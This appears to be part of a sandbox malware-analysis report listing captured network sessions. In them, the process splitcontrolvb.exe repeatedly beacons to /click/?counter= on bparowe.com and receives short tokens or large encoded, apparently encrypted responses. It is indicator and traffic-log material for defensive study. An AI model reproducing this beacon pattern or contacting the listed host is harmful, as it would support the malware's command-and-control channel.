                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:59.911797047 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:59 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 66 36 34 0d 0a 64 65 32 66 66 65 39 31 32 63 31 61 35 32 35 39 65 62 32 33 36 34 33 64 36 63 30 66 61 34 35 39 33 36 66 66 30 39 34 38 39 65 34 64 30 65 63 35 66 38 61 30 39 35 61 66 65 61 36 38 38 63 33 66 30 66 33 66 31 63 39 36 39 32 30 39 64 30 34 61 35 37 39 64 30 61 64 33 30 33 38 37 31 31 61 38 62 66 66 33 35 30 39 39 35 65 39 66 32 37 30 30 39 36 32 37 39 64 35 62 39 62 39 66 33 36 32 37 36 63 34 33 61 39 32 37 32 35 36 63 63 32 39 37 36 65 33 33 38 30 38 39 63 35 33 30 35 39 35 38 38 61 64 62 30 36 66 32 31 30 63 37 64 63 34 32 62 32 32 33 33 62 30 31 35 37 63 32 34 32 32 36 64 66 35 35 66 63 33 39 38 33 34 32 34 63 61 39 32 61 66 34 61 37 31 65 39 36 34 36 35 39 61 33 62 37 62 64 38 38 66 65 64 33 61 65 35 36 65 30 66 62 62 63 39 65 64 61 33 38 33 38 38 32 31 64 61 33 33 31 65 65 37 39 30 37 61 31 62 65 37 65 61 35 30 32 64 66 62 37 37 33 39 65 31 31 62 31 63 61 39 32 33 30 35 37 39 64 62 31 64 36 33 32 39 64 65 64 38 62 65 61 31 38 66 39 34 36 64 35 35 34 32 38 64 62 32 38 61 61 39 34 33 62 63 32 37 61 30 38 35 35 34 63 39 36 64 37 66 31 64 39 65 63 37 62 37 38 34 61 32 39 32 34 62 33 36 62 65 62 62 61 32 36 32 35 32 33 61 30 63 62 37 33 36 31 33 38 31 61 65 31 39 34 36 35 35 61 34 33 62 66 34 66 62 65 62 33 66 62 64 30 33 65 32 31 31 32 31 31 32 33 34 66 64 63 30 32 64 30 35 63 30 34 35 36 66 35 31 38 31 61 33 38 38 32 65 63 63 32 37 38 38 34 39 36 64 63 38 65 30 64 34 32 33 36 63 34 61 65 34 37 36 35 65 37 66 62 37 61 34 38 39 39 65 38 34 38 38 37 31 38 66 33 31 66 34 33 38 34 32 66 63 61 66 30 62 63 32 35 35 62 65 63 37 30 63 37 37 62 33 35 36 35 62 33 34 38 66 35 66 35 63 64 31 38 32 66 31 32 63 30 62 64 38 64 63 38 63 63 65 33 35 34 36 37 64 38 35 66 31 62 39 39 30 35 32 30 63 38 32 31 38 63 64 34 37 30 31 37 34 38 36 35 31 66 34 65 39 39 64 65 30 32 39 33 64 61 39 30 32 35 37 61 38 31 64 30 63 38 33 61 37 63 31 66 62 38 32 61 34 36 64 64 63 31 33 35 34 65 31 63 30 63 62 37 30 38 66 39 65 63 36 63 35 34 38 66 35 65 65 65 65 64 30 63 30 33 62 33 62 65 66 33 36 64 35 31 31 34 35 65 39 37 34 65 36 66 62 39 66 62 61 33 64 63 64 66 31 66 61 34 37 35 31 61 61 62 32 65 65 31 30 32 37 39 30 36 37 31 34 63 63 33 35 31 63 66 65 31 31 32 32 37 38 62 35 62 37 35 65 66 63 35 63 66 38 61 66 63 33 61 64 30 65 66 32 37 33 31 31 63 61 37 36 34 31 33 61 31 31 36 31 33 39 65 66 32 62 30 31 34 65 38 63 63 62 66 30 34 63 35 61 65 38 30 65 32 62 65 36 65 31 36 66 33 64 66 62 32 63 31 37 30 32 38 33 61 36 64 61 66 37 30 38 35 39 66 35 30 32 34 38 66 34 39 38 35 32 64 31 61 61 63 35 61 32 64 62 33 31 63 34 30 31 37 65 64 32 36 38 66 36 32 62 32 63 64 63 32 64 33 39 64 62 30 35 62 32 39 66 36 63 33 39 33 62 38 36 38 31 38 30 65 61 61 32 34 33 38 66 61 66 65 38 61 32 65 65 65 61 31 39 30 39 38 36 65 37 32 31 65 61 34 39 66 35 64 65 37 37 37 65 30 66 66 64 33 33 30 33 64 36 32 37 39 34 64 35 37 36 38 34 39 36 34 63 63 36 39 35 61 61 66 64 66 66 30 35 30 61 30 66 32 32 64 36 65 35 65 66 32 66 66 66 62 37 33 31 38 30 65 30 39 31 31 36 63 62 61 35 63 38 37 64 38 39 36 66 36 64 38 37 31 32 34 39 31 37 61 38 31 35 61 37 39 36 34 38 36 66 38 32 32 31 66 39 33 30 36 34 32 62 35 62 64 32 38 32 38 66 61 38 65 31 34 33 30 64 66 31 63 36 62 66 61 61 61 31 31 39 32 33 31 61 37 66 34 34 30 38 63 30 63 36 30 39 32 63 64 64 33 36 36 63
                                                                                                                                                                                                                                                                                                                                Data Ascii: f64de2ffe912c1a5259eb23643d6c0fa45936ff09489e4d0ec5f8a095afea688c3f0f3f1c969209d04a579d0ad3038711a8bff350995e9f270096279d5b9b9f36276c43a927256cc2976e338089c53059588adb06f210c7dc42b2233b0157c24226df55fc3983424ca92af4a71e964659a3b7bd88fed3ae56e0fbbc9eda3838821da331ee7907a1be7ea502dfb7739e11b1ca9230579db1d6329ded8bea18f946d55428db28aa943bc27a08554c96d7f1d9ec7b784a2924b36bebba262523a0cb7361381ae194655a43bf4fbeb3fbd03e211211234fdc02d05c0456f5181a3882ecc2788496dc8e0d4236c4ae4765e7fb7a4899e8488718f31f43842fcaf0bc255bec70c77b3565b348f5f5cd182f12c0bd8dc8cce35467d85f1b990520c8218cd4701748651f4e99de0293da90257a81d0c83a7c1fb82a46ddc1354e1c0cb708f9ec6c548f5eeeed0c03b3bef36d51145e974e6fb9fba3dcdf1fa4751aab2ee1027906714cc351cfe112278b5b75efc5cf8afc3ad0ef27311ca76413a116139ef2b014e8ccbf04c5ae80e2be6e16f3dfb2c170283a6daf70859f50248f49852d1aac5a2db31c4017ed268f62b2cdc2d39db05b29f6c393b868180eaa2438fafe8a2eeea190986e721ea49f5de777e0ffd3303d62794d57684964cc695aafdff050a0f22d6e5ef2fffb73180e09116cba5c87d896f6d87124917a815a796486f8221f930642b5bd2828fa8e1430df1c6bfaaa119231a7f4408c0c6092cdd366c
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:59.911874056 CET1286INData Raw: 34 37 33 62 38 38 63 63 35 30 65 35 38 61 62 64 36 39 30 36 65 36 66 66 33 36 30 65 38 36 36 61 62 61 33 65 65 64 31 65 63 39 32 31 32 34 32 33 38 32 34 38 32 37 31 35 36 62 39 37 37 37 66 61 36 61 36 36 35 36 30 35 31 31 35 39 36 61 64 30 39 36
                                                                                                                                                                                                                                                                                                                                Data Ascii: 473b88cc50e58abd6906e6ff360e866aba3eed1ec9212423824827156b9777fa6a66560511596ad0964ef6433ad8c78f5ae41756361fc6d236dbdc5177441f6c1d590f1e58e09e363397cd2bf5ac9ba242bc0e45ce6d24cf238ad875b480dd814d00a3901cd1f35482034f85c4ba4ced30170cdbefbb21a4c8a
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:59.911952972 CET1286INData Raw: 35 38 66 32 61 63 62 39 32 30 33 61 63 35 61 65 65 62 34 66 65 31 33 64 39 63 30 65 37 38 38 37 31 34 66 38 65 38 63 38 33 66 35 64 32 63 62 65 65 63 63 64 31 62 35 61 62 33 39 62 31 35 34 64 39 31 30 37 62 63 34 64 61 61 62 32 64 30 64 39 64 36
                                                                                                                                                                                                                                                                                                                                Data Ascii: 58f2acb9203ac5aeeb4fe13d9c0e788714f8e8c83f5d2cbeeccd1b5ab39b154d9107bc4daab2d0d9d64c158525433a9c3b820c3fd4e2bdd75d23ce6a3328d7441694630b69331f182bc29d0276841baeabd7c04488999721ac47ac5d7119977393e4026c7427e3f85a2da3b61b8bcbab90332231c2c2e98fe0e
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:59.912007093 CET285INData Raw: 35 39 32 35 33 61 66 34 65 63 36 37 30 36 34 34 65 32 61 33 33 37 35 37 62 63 66 61 36 64 31 34 33 64 38 34 61 30 30 35 37 39 36 31 36 36 39 37 66 37 34 61 31 65 36 63 65 62 62 62 64 61 30 64 37 65 32 66 35 64 35 35 30 30 33 64 61 32 64 39 37 36
                                                                                                                                                                                                                                                                                                                                Data Ascii: 59253af4ec670644e2a33757bcfa6d143d84a00579616697f74a1e6cebbbda0d7e2f5d55003da2d976c839ec6ce7f476fc62be43e9a6261643f2a54a661026e48a83e7dc695df54e44922ab7aef2c6cc0ae21d71efc4e0348b0e427a3e6fb5e250a47331bc0598eb992cd31e52556d7e238a571e5e766a96239
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:59.912089109 CET300INData Raw: 31 32 30 0d 0a 34 36 32 32 35 65 38 31 35 33 38 34 35 31 65 39 34 30 65 66 62 65 65 36 39 34 38 62 36 63 39 66 31 66 34 61 63 39 35 64 62 33 61 32 64 39 36 33 34 38 37 35 31 39 37 64 64 61 36 66 38 62 39 61 62 38 61 32 66 38 66 33 32 61 38 32 37
                                                                                                                                                                                                                                                                                                                                Data Ascii: 12046225e81538451e940efbee6948b6c9f1f4ac95db3a2d9634875197dda6f8b9ab8a2f8f32a82727a65ccaf887a20488b398bda65643f91c6608c2391246fd32fa56a48a3fbfde98c49720e37a411a1ba2a9ed361067558abae66074f6bccb63390e68033e5bdb44612901afaf4e59b938e64e4925f0023
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:03.233088970 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:03.566416979 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:03 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                151192.168.2.456115185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:04.008460999 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:04.287538052 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:04 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 66 36 34 0d 0a 64 65 32 66 65 38 38 65 32 36 31 64 34 37 34 39 62 39 36 34 37 38 33 39 33 39 36 39 66 38 30 37 33 39 66 62 31 31 35 37 39 34 34 37 31 37 64 61 66 63 61 65 38 63 62 62 62 38 32 65 63 32 36 32 36 30 37 63 35 30 63 39 64 33 34 66 64 63 34 61 34 38 64 32 34 37 39 37 34 35 65 64 34 62 65 32 62 37 66 36 34 65 39 33 35 37 39 65 33 63 31 66 39 32 32 62 38 37 34 37 39 62 39 35 32 32 32 35 36 38 34 39 61 33 32 34 32 30 37 32 63 38 39 30 36 30 33 33 38 61 38 64 64 64 32 62 35 62 35 33 38 66 63 35 30 37 66 30 31 35 63 34 64 61 35 63 62 33 32 64 33 39 31 61 34 61 63 61 35 63 32 39 63 35 35 65 66 64 33 34 39 64 34 33 34 30 61 65 32 37 65 62 61 35 31 61 39 62 35 65 35 64 62 63 62 36 61 33 38 31 65 39 64 36 61 64 35 32 66 65 66 61 62 65 39 31 64 35 32 35 33 39 38 32 31 65 62 61 33 37 66 30 37 33 31 64 61 36 61 37 37 66 61 66 30 36 63 31 62 36 37 64 39 32 31 37 61 66 63 62 39 39 33 39 34 38 39 34 61 36 64 37 32 34 38 32 65 36 38 36 65 38 30 35 66 31 34 33 64 34 35 35 32 66 63 35 32 61 61 35 39 33 32 34 63 62 36 34 30 62 34 32 35 33 39 32 64 64 66 33 63 37 65 64 37 38 37 38 34 31 32 37 33 61 62 35 36 33 66 65 62 39 32 33 32 35 32 33 61 65 63 36 36 37 36 35 33 63 31 32 66 66 39 65 36 34 35 39 34 31 61 37 34 39 62 37 61 64 66 31 64 31 33 65 33 37 30 64 31 65 32 33 35 62 64 38 30 32 64 34 34 32 30 38 35 30 66 65 31 36 30 34 33 65 38 61 66 39 63 31 37 35 38 35 39 36 64 35 38 39 31 31 34 61 33 31 63 34 62 30 34 33 36 63 65 63 66 62 37 32 35 36 39 35 65 38 35 65 38 30 30 36 66 35 30 34 34 37 39 64 32 36 63 65 65 65 62 65 32 37 35 39 65 37 37 38 63 65 36 35 33 36 36 36 61 62 35 34 66 37 66 63 63 64 31 39 32 65 30 36 63 39 62 63 38 37 63 32 63 38 65 62 35 31 37 32 64 33 35 66 30 36 38 35 30 37 32 35 63 38 32 37 38 38 63 33 37 62 31 36 34 62 36 66 31 37 34 61 39 66 63 62 30 38 39 66 64 61 39 37 32 30 37 61 38 38 64 32 63 34 32 35 37 38 31 61 62 65 32 62 34 65 64 38 64 66 33 37 34 34 31 33 31 62 61 64 30 63 65 34 66 33 36 64 35 36 38 36 34 33 65 61 65 35 30 64 30 39 62 36 61 30 66 61 36 64 34 38 30 62 35 39 39 32 34 65 36 63 62 66 66 35 62 37 64 63 64 37 31 35 61 35 37 65 31 32 61 39 33 31 65 62 30 34 37 39 30 35 37 30 34 36 63 33 35 37 63 35 66 35 31 30 32 66 38 63 35 61 37 30 65 38 64 62 63 30 38 38 65 61 33 64 63 64 65 35 33 64 33 38 30 61 61 63 36 33 31 32 62 66 31 63 31 31 39 35 66 64 61 64 31 36 65 38 63 65 61 30 30 65 63 32 61 65 38 39 65 64 61 37 36 31 31 34 65 64 64 65 62 64 63 61 37 39 32 64 32 34 36 34 61 66 37 61 38 35 39 66 35 37 32 30 38 66 34 31 38 34 33 30 31 31 61 36 35 32 32 37 62 39 31 64 34 38 31 39 66 35 32 62 39 36 37 65 62 36 64 32 64 65 64 30 38 37 62 33 35 64 32 33 66 33 63 38 39 37 62 31 37 37 31 61 30 61 62 31 33 62 33 39 66 39 66 65 38 39 32 36 65 36 62 35 39 30 39 39 36 37 37 33 31 62 61 31 38 31 35 34 65 65 36 64 66 63 66 65 63 35 32 37 33 62 36 30 37 39 35 33 35 35 36 33 34 39 36 64 63 63 37 37 35 62 61 63 64 37 65 61 34 63 61 33 66 34 32 64 36 64 35 64 66 33 65 62 66 65 37 34 31 32 30 30 30 31 31 35 37 39 62 30 35 31 38 37 64 62 39 66 66 37 64 38 37 36 32 37 38 65 37 31 38 31 35 63 37 33 36 63 38 66 66 63 33 37 31 63 39 63 31 62 35 65 62 35 62 31 33 35 33 30 66 63 38 33 31 32 32 65 64 65 31 66 36 36 66 35 62 35 31 33 39 33 33 65 62 62 66 30 34 34 38 63 30 66 36 36 38 61 63 36 63 65 36 34 63
                                                                                                                                                                                                                                                                                                                                Data Ascii: f64de2fe88e261d4749b96478393969f80739fb1157944717dafcae8cbbb82ec262607c50c9d34fdc4a48d2479745ed4be2b7f64e93579e3c1f922b87479b9522256849a3242072c89060338a8ddd2b5b538fc507f015c4da5cb32d391a4aca5c29c55efd349d4340ae27eba51a9b5e5dbcb6a381e9d6ad52fefabe91d52539821eba37f0731da6a77faf06c1b67d9217afcb99394894a6d72482e686e805f143d4552fc52aa59324cb640b425392ddf3c7ed787841273ab563feb9232523aec667653c12ff9e645941a749b7adf1d13e370d1e235bd802d4420850fe16043e8af9c1758596d589114a31c4b0436cecfb725695e85e8006f504479d26ceeebe2759e778ce653666ab54f7fccd192e06c9bc87c2c8eb5172d35f06850725c82788c37b164b6f174a9fcb089fda97207a88d2c425781abe2b4ed8df3744131bad0ce4f36d568643eae50d09b6a0fa6d480b59924e6cbff5b7dcd715a57e12a931eb0479057046c357c5f5102f8c5a70e8dbc088ea3dcde53d380aac6312bf1c1195fdad16e8cea00ec2ae89eda76114eddebdca792d2464af7a859f57208f41843011a65227b91d4819f52b967eb6d2ded087b35d23f3c897b1771a0ab13b39f9fe8926e6b5909967731ba18154ee6dfcfec5273b6079535563496dcc775bacd7ea4ca3f42d6d5df3ebfe741200011579b05187db9ff7d876278e71815c736c8ffc371c9c1b5eb5b13530fc83122ede1f66f5b513933ebbf0448c0f668ac6ce64c
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:04.288077116 CET1286INData Raw: 34 37 66 62 33 38 36 63 36 31 30 35 31 61 65 64 64 38 62 37 31 36 39 66 32 37 38 66 37 36 36 61 66 62 37 65 64 64 35 65 66 39 33 31 33 34 33 33 66 33 31 38 31 37 61 34 64 61 36 36 38 37 65 61 34 62 66 36 65 36 34 35 36 30 62 39 63 61 65 30 62 36
                                                                                                                                                                                                                                                                                                                                Data Ascii: 47fb386c61051aedd8b7169f278f766afb7edd5ef9313433f31817a4da6687ea4bf6e64560b9cae0b60f16531a09b74ebb247717e6af86b3d64b9c8186940f5c8ca90f4fc910ee0773a75ccbe59cabf3a29c4ef4be3cb4cef24ad864f420fd21cd10b3016c90736572523e25b5dafced50b71c6b7ffa7154a8a
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:04.288140059 CET1286INData Raw: 62 38 64 32 30 63 64 38 35 30 30 62 33 34 36 65 63 62 37 65 36 31 38 64 64 63 35 66 39 38 32 37 35 34 65 38 30 39 31 38 34 66 33 63 37 63 66 65 61 64 34 63 65 62 32 62 31 33 64 62 65 35 36 63 37 31 31 37 37 63 37 64 39 61 63 33 33 30 66 39 64 36
                                                                                                                                                                                                                                                                                                                                Data Ascii: b8d20cd8500b346ecb7e618ddc5f982754e809184f3c7cfead4ceb2b13dbe56c71177c7d9ac330f9d6ede5f5d4f2ca9cfa32bc6fd5027d277cc3de8b53b96775e605f34bd8f39f488b428d6247f41a5e2a17c1c4e9080791ace79cedf12826b3f3f4027c542703c85a3da3b6ababca2ba1f32340429329ee305
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:04.288317919 CET285INData Raw: 38 39 33 35 36 61 31 35 31 63 37 37 31 37 33 35 31 32 33 33 33 36 66 37 30 63 38 61 36 63 66 34 31 64 37 34 64 30 32 35 33 38 38 31 37 36 62 37 33 36 62 61 61 65 34 63 65 62 66 62 61 61 61 63 61 65 37 66 37 63 30 35 36 30 38 64 35 33 32 39 36 36
                                                                                                                                                                                                                                                                                                                                Data Ascii: 89356a151c771735123336f70c8a6cf41d74d025388176b736baae4cebfbaaacae7f7c05608d53296648981cecf615b73c42af03d99646b6c3e235bb964027057ae3a7dc994cb54e74f23a973ea396fd6ad38cb19fc560a49aee528a4e8fb40240248280dcb4689a495c72ce4225ddcef3dbb78e1ec7db46627
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:04.288341045 CET155INData Raw: 39 30 0d 0a 34 30 33 36 35 32 38 33 34 64 38 64 35 32 65 34 34 66 66 30 62 38 65 36 38 61 38 31 36 37 39 65 31 66 34 61 63 31 35 61 61 37 61 31 64 39 36 36 35 36 37 66 31 30 37 66 64 63 37 31 38 61 39 61 62 35 62 64 66 36 66 37 32 61 38 31 37 30
                                                                                                                                                                                                                                                                                                                                Data Ascii: 90403652834d8d52e44ff0b8e68a81679e1f4ac15aa7a1d966567f107fdc718a9ab5bdf6f72a8170616eccae967b294983228adb697b3591dd788e359a2f66cd2ea86345a7e5fce9a20


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                152192.168.2.456117185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:04.958018064 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:05.238477945 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:05 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                153192.168.2.456118185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:05.669435024 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:05.943856955 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:05 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                154192.168.2.456119185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:06.326263905 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:06.607650995 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:06 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                155192.168.2.456120185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:07.028938055 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:07.308445930 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:07 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                156192.168.2.456121185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:07.768121004 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:08.042912960 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:07 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                157192.168.2.456122185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
